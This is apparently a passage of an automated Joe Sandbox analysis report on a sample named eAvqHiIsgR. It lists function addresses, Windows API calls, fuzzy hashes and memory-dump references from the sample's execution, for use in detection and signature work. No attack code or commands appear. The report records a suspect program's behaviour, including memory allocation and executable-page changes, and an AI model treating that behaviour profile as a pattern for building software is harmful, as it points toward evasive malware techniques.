Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19

Function 00405761 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D

Function 72A42A38 Relevance: 1.6, APIs: 1, Instructions: 143memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(00000000), ref: 72A42AF7

Memory Dump Source

Source File: 00000000.00000002.3692894064.0000000072A41000.00000020.00000001.01000000.00000005.sdmp, Offset: 72A40000, based on PE: true

Associated: 00000000.00000002.3692870436.0000000072A40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3692910209.0000000072A43000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3692981384.0000000072A45000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a40000_eAvqHiIsgR.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2bbdca54275d0c06ec40212366079209ac6ef86f11803a8a70ae6eeae97a024c
Instruction ID: 8a549e8822df2aef5d2f7a4ffbd1eff9b6617cbd420399db286888caf67271f2
Opcode Fuzzy Hash: 2bbdca54275d0c06ec40212366079209ac6ef86f11803a8a70ae6eeae97a024c
Instruction Fuzzy Hash: 3D418373580204DFDB21DFAED980B593BB4EB88314F30682AE505C7259CF39E5A2CB61

Function 0040266D Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: wsprintf
String ID:
API String ID: 2111968516-0
Opcode ID: 367ecb1198001a867d8e3b7756d3c175cfd735077116dd6966e3788219f0b2a9
Instruction ID: 7f5a5d1368c13d317d2e99ee4d98356b480ceadea176dd08c5889da6900fd1c4
Opcode Fuzzy Hash: 367ecb1198001a867d8e3b7756d3c175cfd735077116dd6966e3788219f0b2a9
Instruction Fuzzy Hash: 7E21B730D04299FADF328BA885886AEBB749F11314F1440BFE491B73D1C2BD8A85DB19

Function 0040166A Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

MoveFileA.KERNEL32(00000000,00000000), ref: 00401685

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 1edc5c0a003d732ce3bee6573eefb30b8b2fa69015ea7de72e37931521f2516e
Instruction ID: c16fe538d576f0a812f108a5c598968f2bbae53de2c44bc87e09c6d73b5458c5
Opcode Fuzzy Hash: 1edc5c0a003d732ce3bee6573eefb30b8b2fa69015ea7de72e37931521f2516e
Instruction Fuzzy Hash: EEF01D3160852496DB20ABA54E49E5F3264DB42769B24033BF422B21D1EABC8542956E

Function 0040272B Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402749

Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 6490c60e78b8e72c9ff7044d1ebd2fda03870678213011db9787ff048aa9e55a
Instruction ID: d2cb0ca5e863be2ef59b536234997f243a65a7806d73518010ac019a9530af38
Opcode Fuzzy Hash: 6490c60e78b8e72c9ff7044d1ebd2fda03870678213011db9787ff048aa9e55a
Instruction Fuzzy Hash: 7EE09271B00114EED711FBA4AE49DBF77B8EB40315B10403BF102F10C1CABC49128A2E

Function 0040239C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023D5

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
Instruction ID: a2264a5e3b04165b7de03e79847980bb6a424129cbe2f78830b73284cd35be0b
Opcode Fuzzy Hash: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
Instruction Fuzzy Hash: F8E04831610114ABD7203EB14F8D97F31A9DB44304B34153FBA11761C6D9FC5C414279

Function 0040171F Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: e053cd0a5a713bcd6573213f31fe775dca372833d122c7f25a227a8b80c7c065
Instruction ID: 99b882ef8ac932529d6fdfe3c41faefb6a71927cb26e20fd81cb329c01224dc0
Opcode Fuzzy Hash: e053cd0a5a713bcd6573213f31fe775dca372833d122c7f25a227a8b80c7c065
Instruction Fuzzy Hash: 93E0DF72304210EFD710DF649E49BAB37A8DF10368B20427AE111A60C2E6F89906873D

Function 00405FAB Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402C7F,00000000,?,?), ref: 00405FD4

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
Instruction ID: 8c71f3c26dc4a4bf3eef9e60a583d004d00a96479e721722a8f6be6a9d57506c
Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
Instruction Fuzzy Hash: 1CE0E6B201450ABEDF095F50DD0ED7B3B1DE704300F14452EF906D4050E6B5A9205A34

Function 00405D08 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4

Function 00405D37 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8

Function 72A42921 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(72A4404C,00000004,00000040,72A4403C), ref: 72A4293F

Memory Dump Source

Source File: 00000000.00000002.3692894064.0000000072A41000.00000020.00000001.01000000.00000005.sdmp, Offset: 72A40000, based on PE: true

Associated: 00000000.00000002.3692870436.0000000072A40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3692910209.0000000072A43000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3692981384.0000000072A45000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a40000_eAvqHiIsgR.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: bcd22bf4bc15bb4e219002f2f485f73e9f3b605434b2a595888fff97ebaf2894
Instruction ID: 8e8a451949760fd47c50ff6a808f3128dcf029f095497080e08f9af82585d201
Opcode Fuzzy Hash: bcd22bf4bc15bb4e219002f2f485f73e9f3b605434b2a595888fff97ebaf2894
Instruction Fuzzy Hash: 87F092B3988281DED361CF6E84847053FF0A398354B314E6EE598D7241E73EE1668B11

Function 004023E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402413

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: b20ff68c1f91e8945650ad06eb6636fe2efcf37a6f72d7170e5f25b2e3b7c808
Instruction ID: ec2b9ed2aa8753cc56e49b6d1f5b0ead50a941972cde74363bc07da0fbfd84e4
Opcode Fuzzy Hash: b20ff68c1f91e8945650ad06eb6636fe2efcf37a6f72d7170e5f25b2e3b7c808
Instruction Fuzzy Hash: 40E04630904208BAEB006FA08E09EAD3A79EF01710F20003AF9617B0D1E6B89482D72E

Function 00405F7D Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,0042A070,?,?,0040600B,0042A070,?,?,?,00000002,Call), ref: 00405FA1

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
Instruction ID: 8d979316dbb681ef417a562383420c35b8ea1d7cbf1ba97b3ef1f912197d15a8
Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
Instruction Fuzzy Hash: 26D0EC7200460ABBDF115E90DD05FAB3B1DEB08310F044426FA05E5091D679D530AA25

Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5887674a1f5513ec9541be2dff6cbc71c684969360942c525d855edfecb85619
Instruction ID: 936ed37629fa473271aaed7dd48578ad272974d6d3f069640798472dc64bc079
Opcode Fuzzy Hash: 5887674a1f5513ec9541be2dff6cbc71c684969360942c525d855edfecb85619
Instruction Fuzzy Hash: F6D01232704115DBDB10EFA59B08A9E73B5EB10325B308277E111F21D1E6B9C9469A2D

Function 00403300 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D

Function 00401F7B Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,759223A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,759223A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,759223A0), ref: 0040527A
Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA

Part of subcall function 00405796: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
Part of subcall function 00405796: CloseHandle.KERNEL32(?), ref: 004057CC

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0

Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406586
Part of subcall function 00406575: GetExitCodeProcess.KERNEL32(?,?), ref: 004065A8

Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: ada5aadaf350f23a8dbf3a026041224ab9f957c4560aafed3a43088b721b475c
Instruction ID: 93961662e530d2e5a08160df11036b73ffef590b917d11c16f189fde5a143e01
Opcode Fuzzy Hash: ada5aadaf350f23a8dbf3a026041224ab9f957c4560aafed3a43088b721b475c
Instruction Fuzzy Hash: 88F09032A05021EBCB20BBA15E84DAFB2B5DF01318B21423FF502B21D1DB7C4D425A6E

Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014E9

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
